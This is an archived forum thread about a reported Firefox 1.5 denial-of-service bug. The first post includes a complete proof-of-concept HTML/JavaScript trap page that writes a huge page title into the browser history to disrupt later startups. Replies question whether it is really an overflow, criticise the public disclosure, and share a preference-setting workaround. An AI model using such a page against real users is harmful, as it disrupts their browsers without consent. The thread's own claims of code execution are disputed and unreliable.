FireFox 1.5 Buffer overflow exploit

Discussion of bugs in Mozilla Firefox
markedmannerf
Guest

FireFox 1.5 Buffer overflow exploit

Post by markedmannerf »

This may Ive already been reported but Im going to post it here.

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
User avatar
name already taken
Posts: 3124
Joined: February 27th, 2004, 9:54 am
Location: Utah

Post by name already taken »

You'll want to file a bug at https://bugzilla.mozilla.org/
"It burns like hygiene!"
User avatar
hellene
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks
Contact:

Post by hellene »

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
User avatar
scratch
Posts: 4942
Joined: November 6th, 2002, 1:27 am
Location: Massachusetts

Post by scratch »

this is NOT the proper way to report a security bug.

please see http://www.mozilla.org/projects/securit ... olicy.html
User avatar
mesostinky
Posts: 215
Joined: November 4th, 2002, 10:44 pm
Location: NJ

Post by mesostinky »

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
User avatar
VIPerous
Posts: 120
Joined: September 20th, 2003, 5:15 am

Post by VIPerous »

Elfguy wrote:It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved?

There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.

The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).

It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!
Unarmed
Posts: 4941
Joined: July 31st, 2003, 1:26 pm

Post by Unarmed »

One-line fix in user.js:

Code: Select all

user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
Elfguy
Posts: 309
Joined: June 27th, 2005, 5:56 pm
Contact:

Post by Elfguy »

User avatar
hellene
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks
Contact:

Post by hellene »

Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
Spaceman-Spiff
Posts: 46
Joined: November 28th, 2002, 6:25 pm

Post by Spaceman-Spiff »

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
Peng
Posts: 778
Joined: November 9th, 2004, 2:31 pm
Location: Central Florida
Contact:

Post by Peng »

Spaceman-Spiff wrote:Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858


They're two different problems.
Hug Peng
(aka Matt Nordhoff)
Check out: Adblock Plus | FoxClocks | OpenBook
Vallejo
Posts: 104
Joined: November 12th, 2004, 6:16 am

Post by Vallejo »

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
diilbert
Posts: 13
Joined: May 15th, 2005, 1:20 pm

Post by diilbert »

Unarmed wrote:One-line fix in user.js:

Code: Select all

user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.


I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?

I am using XP SP2. Thanks.
Locked